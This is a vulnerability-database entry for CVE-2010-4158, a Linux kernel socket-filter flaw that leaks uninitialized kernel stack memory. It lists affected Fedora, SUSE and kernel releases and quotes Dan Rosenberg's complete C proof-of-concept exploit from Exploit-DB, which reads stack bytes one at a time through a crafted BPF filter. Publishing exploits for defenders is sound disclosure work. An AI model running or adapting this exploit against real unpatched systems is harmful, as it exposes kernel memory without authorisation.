CVE-2010-4158

low

Published 2010-12-30 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

3.1

Description

The sk_run_filter function in net/core/filter.c in the Linux kernel before 2.6.36.2 does not check whether a certain memory location has been initialized before executing a (1) BPF_S_LD_MEM or (2) BPF_S_LDX_MEM instruction, which allows local users to obtain potentially sensitive information from kernel stack memory via a crafted socket filter.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-34987 local linux verified text · 4 KB

Dan Rosenberg · 2010-11-09

Linux Kernel 2.6.x - 'net/core/filter.c' Local Information Disclosure

text exploit Source: Exploit-DB

/*
source: https://www.securityfocus.com/bid/44758/info

The Linux kernel is prone to a local information-disclosure vulnerability.

Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 
*/

/*
 * You've done it.  After hours of gdb and caffeine, you've finally got a shell
 * on your target's server.  Maybe next time they will think twice about
 * running MyFirstCompSciProjectFTPD on a production machine.  As you take
 * another sip of Mountain Dew and pick some of the cheetos out of your beard,
 * you begin to plan your next move - it's time to tackle the kernel.
 *
 * What should be your goal?  Privilege escalation?  That's impossible, there's
 * no such thing as a privilege escalation vulnerability on Linux.  Denial of
 * service?  What are you, some kind of script kiddie?  No, the answer is
 * obvious.  You must read the uninitialized bytes of the kernel stack, since
 * these bytes contain all the secrets of the universe and the meaning of life.
 *
 * How can you accomplish this insidious feat?  You immediately discard the
 * notion of looking for uninitialized struct members that are copied back to
 * userspace, since you clearly need something far more elite.  In order to
 * prove your superiority, your exploit must be as sophisticated as your taste
 * in obscure electronic music.  After scanning the kernel source for good
 * candidates, you find your target and begin to code...
 *
 * by Dan Rosenberg
 *
 * Greets to kees, taviso, jono, spender, hawkes, and bla
 *
 */

#include <string.h>
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <linux/filter.h>

#define PORT 37337

int transfer(int sendsock, int recvsock)
{

        struct sockaddr_in addr;
        char buf[512];
        int len = sizeof(addr);

        memset(buf, 0, sizeof(buf));
        
        if (fork())
                return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)&addr, &len);

        sleep(1);

        memset(&addr, 0, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_port = htons(PORT);
        addr.sin_addr.s_addr = inet_addr("127.0.0.1");
        
        sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len);

        exit(0);

}

int main(int argc, char * argv[])
{

        int sendsock, recvsock, ret;
        unsigned int val;       
        struct sockaddr_in addr;
        struct sock_fprog fprog;
        struct sock_filter filters[5];

        if (argc != 2) {
                printf("[*] Usage: %s offset (0-63)\n", argv[0]);
                return -1;
        }

        val = atoi(argv[1]);

        if (val > 63) {
                printf("[*] Invalid byte offset (must be 0-63)\n");
                return -1;
        }

        recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

        if (recvsock < 0 || sendsock < 0) {
                printf("[*] Could not create sockets.\n");
                return -1;
        }

        memset(&addr, 0, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_port = htons(PORT);
        addr.sin_addr.s_addr = htonl(INADDR_ANY);

        if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
                printf("[*] Could not bind socket.\n");
                return -1;
        }

        memset(&fprog, 0, sizeof(fprog));
        memset(filters, 0, sizeof(filters));

        filters[0].code = BPF_LD|BPF_MEM;
        filters[0].k = (val & ~0x3) / 4;

        filters[1].code = BPF_ALU|BPF_AND|BPF_K;
        filters[1].k = 0xff << ((val % 4) * 8);

        filters[2].code = BPF_ALU|BPF_RSH|BPF_K;
        filters[2].k = (val % 4) * 8;

        filters[3].code = BPF_ALU|BPF_ADD|BPF_K;
        filters[3].k = 256;

        filters[4].code = BPF_RET|BPF_A;

        fprog.len = 5;
        fprog.filter = filters;

        if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)) < 0) {
                printf("[*] Failed to install filter.\n");
                return -1;
        }

        ret = transfer(sendsock, recvsock);

        printf("[*] Your byte: 0x%.02x\n", ret - 248);

}

OS impact

Fedora Affected 1 release

Version	Status	Fixed in
13	Affected	—

Linux kernel Affected 1 release

Version	Status	Fixed in
—	Affected	`2.6.36.2`

SUSE Affected 5 releases

Version	Status	Fixed in
11.3	Affected	—
11.2	Affected	—
11	Affected	—
10	Affected	—
9	Affected	—

References

CWEs

CWE-200

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.